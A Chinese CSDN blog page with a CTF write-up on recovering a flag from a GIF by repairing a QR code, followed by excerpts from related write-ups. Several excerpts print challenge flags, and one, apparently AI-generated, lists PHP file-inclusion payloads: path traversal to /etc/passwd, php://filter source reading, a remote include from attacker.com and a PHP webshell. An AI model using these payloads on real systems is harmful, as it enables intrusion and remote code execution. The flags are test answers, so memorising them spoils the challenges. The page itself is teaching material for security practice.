XCTF(MISC) give_you_flag

最新推荐文章于 2025-05-17 22:34:20 发布
最新推荐文章于 2025-05-17 22:34:20 发布
阅读量1k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: XCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/YenKoc/article/details/104104718
本文介绍了一种使用stegsolve工具分析图片中的隐藏信息的方法,通过逐帧查看找到残缺的二维码,修复并扫描二维码获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目描述:菜狗找到了文件中的彩蛋很开心,给菜猫发了个表情包

  • 1.下载附件,点击查看

在这里插入图片描述

  • 发现在数完钱后,有出现一个二维码的东西。

  • 2.使用stegsolv工具,进行逐帧查看。

说个题外话,stegsolve工具,如何使用:
1.点击analyse,下面有几个按钮
2.1.DATA Extract 数据抽取,图中隐藏的数据
2.2 FILE FORMAT 文件格式,文件的具体信息
2.3 Frame Browser 逐帧查看(这个也是本题要使用的)
2.4 IMAGE COMbline 图片拼接

之后逐帧分析,找到残缺的二维码。如下图

在这里插入图片描述
发现缺了三个定位符,这时百度定位符,使用任意的p图软件,进行拼接,之后扫码可得flag。

3.拼接后的成果如下。

在这里插入图片描述

XCTF攻防世界:MISC新手题解(1~6)
qq_43233085的博客
12-15 1532
XCTF在线靶场:this_is_flagMISC新手) 纯属签到题,直接将 flag 值复制提交就好。
xctf 攻防世界 MISC
qq_40663734的博客
05-13 8493
第1题 this_is_flag 题目描述:Most flags are in the form flag{xxx}, for example:flag{th1s_!s_a_d4m0_4la9} 第二题ext3 知识点:了解ext3文件系统,熟练使用mount ext3就是Linux中的一个文件系统 解题步骤: 1.搜索字符串flag 2.挂载linux文件 3.查看flag.txt 4.base...
xctf_Give_you_flag
bring_coco的博客
07-11 653
Give_you_flag [目标] 填充二维码 [环境] Windows [工具] Stegsolve [分析] 1.打开gif图片会发现是动图,经过一遍浏览发现有二维码,因此怀疑答案在此 2.运用Stegsolve工具进行分析动图,以便得到二维码那一帧 发现二维码缺少三个定位点,因此需要补全 在进行得到二维码这一帧时,我们还可以使用GIF Frame工具 3.在网上搜寻三个定位点,然后补全扫码等到flag ...
XCTF-MISC-新手区:give_you_flag
1stPeak's Blog
12-03 638
题目: 我们下载附件1,看看里面有什么 打开后才发现,是一个gif图片,并且运行的过程中方发现存在二维码,这时,将gif放入Stegsolve进行分析,获取到下图所示二维码,发现,这个二维码缺少了定位标识符,这时我们将这个二维码截下来,放入到PS中,补全它的三个定位标识符 我是从下图的二维码中将定位符扣出来,拼接到 之后拼接完成后,如下图,之后扫描下图二维码,即可获得flag ...
攻防世界MISC部分题目讲解(新手友好!持更...)
最新发布
Poesie_541的博客
05-17 741
我觉得新手应该在刚开始时通过解题了解CTF各个方向的题型(因为我现在就这样....),所以这篇博文我们用来了解MISC的简单题型。下面不仅包含解题步骤,还包含一些工具下载安装的链接和补充知识。欢迎大家一起讨论。我是通过哔哩哔哩视频()学习解题的,大家可以去观看他的视频。
【攻防世界】Misc-新手区:this_is_flag
hehigoxqc606的博客
09-07 312
前言:类似平时CTF比赛的签到题(送分题) 1)题目如下: 2)解题思路(直观明了) 3)答案 flag{th1s_!s_a_d4m0_4la9} (如有不足或者侵权的地方,请尽快联系我,我会及时修改或删除,非常感谢) 每日一句:And in the end, the greatest thief of all is time. 在变幻的生命里,岁月,原来是最大的小偷。 ...
miscXCTF攻防世界 give_you_flag
weixin_46025603的博客
05-06 250
题目描述:菜狗找到了文件中的彩蛋很开心,给菜猫发了个表情包 题目链接 卡通人物数钱后会显示一张二维码,利用stegsolve查看 图1 二维码符号结构 二维码呈正方形,常见的是黑白两色。在3个角落,印有较小,像“回”字的正方图案。这3个是帮助解码软件定位的图案,用户不需要对准,无论以任何角度扫描,资料仍然可以正确被读取。二维码最大特征为其左上,右上,左下三个大型的如同“回”字的黑白间同心方图案,为其识别定位标记,失去其中一个就会影响识别。 图2 我们采用p图软件截取正常二维码图2中的定位符,然后贴在图1
攻防世界 - MISC - 03 - give_you_flag
古月浪子的博客
10-03 1936
攻防世界 - MISC - 03 - give_you_flag审题思路知识点所需工具解题flag反思与心得 审题 思路 读题后判断flag应该隐藏在表情包中 知识点 考查选手对gif文件的处理能力、PS能力 所需工具 PhotoShop 解题 下载附件,发现是个gif动态图 PhotoShop打开,发现其中一帧有一幅缺少定位点的二维码 手动补上定位点并扫描二维码,得到flag flag f...
CTF学习之路-攻防世界:MISC,入门篇
xuhc25的博客
11-26 3943
一、感谢和安利 我是从攻防世界入门的,感谢攻防世界的免费靶场 靶场地址:攻防世界 https://adworld.xctf.org.cn/ 二、MISC-新手练习篇Writeup 1、this_is_flag WP: 明显,入门用的,了解flag格式,直接提交题目例子的flag就可以了 flag{th1s_!s_a_d4m0_4la9} 2、pdf WP: 题目给的一个PDF文件,使用PDF编辑器打开(我用的是万兴PDF编辑器) 移出来看到就是flag了 3、give_you_flag WP:附件
CTF MISC 杂项入门题解析
热门推荐
攻防人生3722的博客
07-20 1万+
CTF入门学习 入门题1:Most flags are in the form flag{xxx}, for example:flag{th1s_!s_a_d4m0_4la9} 答案:flag{th1s_!s_a_d4m0_4la9} 解析: 考验对flag的认知,flag夺旗。这题说明之后的答题格式都是flag{} 入门题2:菜狗截获了一份报文如下: c8e9aca0c6f2e5f3e8c4efe7a1a0d4e8e5a0e6ece1e7a0e9f3baa0e8eafae3f9e4eafa...
攻防世界新手村初探:MISC篇(1-5)
qq_38737204的博客
01-13 808
前段时间发现了个有趣的网站:攻防世界。 地址:https://adworld.xctf.org.cn/ 攻防世界的答题分为6类: MISC(杂项)、PWN(二进制)、WEB(网络)、REVERSE(逆向)、CRYPTO(加密)、MOBILE(移动) 小白愉快地进入了新手村,准备开启新手历练。在六个类型中,我略有了解的包括WEB和CRYPTO。至于MISC,看起来也很有意思的样子。 本篇主要对MISC部分进行记录。水平有限,小白到目前还出不了新手村,暂且只对部分题目谈谈解决方案和体会。 1.thi
XCTF MISC 新手区 give_you_flag
duwanglai的博客
01-03 172
give_you_flag 附件下载下来是一张gif图片,中间有一帧带有二维码 缺少3个定位点,网上下载定位点图片用图片编辑软件补全 这里我用的是PhotoDemon,毕竟ps有点大材小用了 扫描二维码即可得到flag flag{e7d478cf6b915f50ab1277f78502a2c5} ...
攻防世界之misc新手入门——give_you_flag
Seanfly9105的博客
01-24 1116
攻防世界之misc新手入门——give_you_flag 题目描述:菜狗找到了文件中的彩蛋很开心,给菜猫发了个表情包 思路+步骤: 1.打开附件发现是一张GIF格式的动图,如下: 会发现有一闪而过的二维码,可以用PS或GIF编辑器单独拿出带二维码的那一帧图片,我是直接截的图,如下: 2.发现直接扫码没有反应,百度得知少了二维码的定位点,直接再单独截一个定位点的图,在Word里面操作放在三个定位点缺失的位置,如下: 3.扫码得到flag(这个截图可能不清晰,或者定位点不够准确,所以扫不出来orz) 下面
XCTF 攻防世界 FlagApp
qq_41071646的博客
04-27 618
这个题 就so库里面的算法比较难逆向出来 其它还是比较简单的 看到这就可以去找一下 我们so库中的check 算法了 重点看 v6 这里_mm_load_si128 就是加载了 16个字节 也就是说我们这里是 有16个字节 做了比较 剩下的 xor or and 就是同理 能看到的出来 然后我们看一下 其实 第三个数据 就是和我们前16个字符 轮回异或...
【CTF MISCXCTF GFSJ0512 give_you_flag Writeup(图像处理+QR Code识别)
HEX9CF的技术博客
04-30 681
菜狗找到了文件中的彩蛋很开心,给菜猫发了个表情包。
xctfwp
zyh18851473527的博客
09-23 1227
首先将其拖进IDA64中查看一下 根据代码可以得知猜对50次的数字后就可以get flag了 但是实际上只给buf分配了0x30的空间 buf 长度最长为 0x50 但是当输入大于 49 的时候不会被截断,所以我们只要覆盖到之前的 seed 就可以为所欲为了。 同时注意到 seed 跟 buf 相差的偏移是 0x40,所以只要 68 个字符就可以溢出覆盖 seed 了。我们写入0x40的数据就可以...
xctf攻防世界 MISC高手进阶区 flag_universe
l8947943的博客
01-17 7050
1. 进入环境,下载附件 下载后,给的是pcapng文件,果断使用wireshark打开,在其中搜索关键词flag,发现如下: 2. 问题分析 追踪流 可以看到,采用的ftp协议,对文件flag.txt、new_uniberse.png和universe.png文件进行了上传,因此,解题关键是把上传的图片给还原出来。 找到new_uniberse.png 如图: 把找到的上传图片追踪流导出来,在这里推荐使用工具用NetworkMiner打开流量包,他妈的电脑安装后缺少什么dll文件,人麻了,手
XCTF2023-Flagio
W_70000的博客
01-23 1149
XCTF2023-Flaio (Android逆向, 文章标签里面没有找到逆向的标签)
give_you_flag(GIF原理、二维码定位符)
Welcome To Myon'Blog !
04-17 1439
GIF分解成图片、二维码定位符修复、QR Research扫描
xctf web_php_include
03-29
<think>好的,用户需要了解XCTF竞赛中与PHP include相关的Web安全漏洞的解题思路。首先,我应该回忆PHP中的文件包含漏洞,尤其是include函数的不当使用可能导致的安全问题。用户提到的引用[4]中的代码显示,$lan变量直接来自Cookie中的language值,然后拼接.php后缀进行包含。这种情况下,如果没有严格的过滤,攻击者可能通过修改Cookie来包含任意文件,比如利用路径遍历或者远程文件包含。 接下来,我需要考虑常见的利用方法。例如,路径遍历攻击,用户可能构造类似../../etc/passwd的payload来读取系统文件。此外,如果服务器配置允许远程包含(allow_url_include为On),攻击者可以包含恶意服务器上的文件执行代码。引用[3]的PHP类型比较文档可能帮助理解变量处理,但这里更关键的是文件包含漏洞。 然后,解题步骤可能包括:检查代码中是否存在未过滤的用户输入,尝试包含敏感文件如/etc/passwd,或者上传恶意文件并通过包含执行。例如,在引用[4]的情况中,设置Cookie的language为../../../tmp/uploaded_file,如果存在上传临时文件的话。还可能利用PHP伪协议,如php://filter来读取源码,比如?lan=php://filter/convert.base64-encode/resource=config,这样可以获取base64编码后的文件内容。 同时,需要注意引用[2]中提到的情况,通过文件包含读取admin.php或function.php的源码,这可能泄露关键信息。此外,确保回答中引用了正确的来源,比如引用[4]的代码示例,说明如何利用Cookie进行文件包含。 最后,生成相关问题时要覆盖漏洞原理、利用方式、防御措施和CTF中的其他常见漏洞,帮助用户全面理解。需要确保回答结构清晰,步骤详细,并且引用正确,比如在关键点后添加[^4]或[^2]。</think>### XCTF PHP include Web安全漏洞解题思路 在CTF竞赛中,PHP的`include`函数常因未正确过滤用户输入导致文件包含漏洞。以下是基于引用[4]的代码分析及典型解题方法: --- #### **漏洞原理** 1. **关键代码片段** 通过Cookie中的`language`参数动态包含文件: ```php $lan = $_COOKIE['language']; @include($lan.".php"); ``` 若未对`$lan`进行过滤,攻击者可通过路径遍历(如`../../../etc/passwd`)或PHP伪协议(如`php://filter`)读取任意文件[^4]。 2. **漏洞利用条件** - 目标服务器开启`allow_url_include`(远程文件包含) - 文件路径可控且未限制文件后缀 --- #### **解题步骤** 1. **探测漏洞** - 修改Cookie中`language`值为`../../../../etc/passwd%00`,尝试读取系统文件(需PHP版本<5.3.4,因空字节截断漏洞)[^4]。 2. **利用PHP伪协议** - **读取源码**:构造Payload为`php://filter/convert.base64-encode/resource=index`,通过Base64解码获取源码: ```http Cookie: language=php://filter/convert.base64-encode/resource=index ``` - **远程代码执行**:若允许远程包含,设置`language=http://attacker.com/shell.txt`,触发恶意代码执行。 3. **结合文件上传** - 若存在文件上传功能,上传含恶意代码的图片(如`<?php system($_GET['cmd']);?>`),通过包含临时文件路径实现RCE: ```http Cookie: language=../../../tmp/uploaded_file ``` --- #### **防御措施** 1. 白名单限制包含路径(如只允许包含`en/`或`zh/`目录) 2. 使用`basename()`函数过滤路径中的特殊字符 3. 关闭`allow_url_include`配置 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值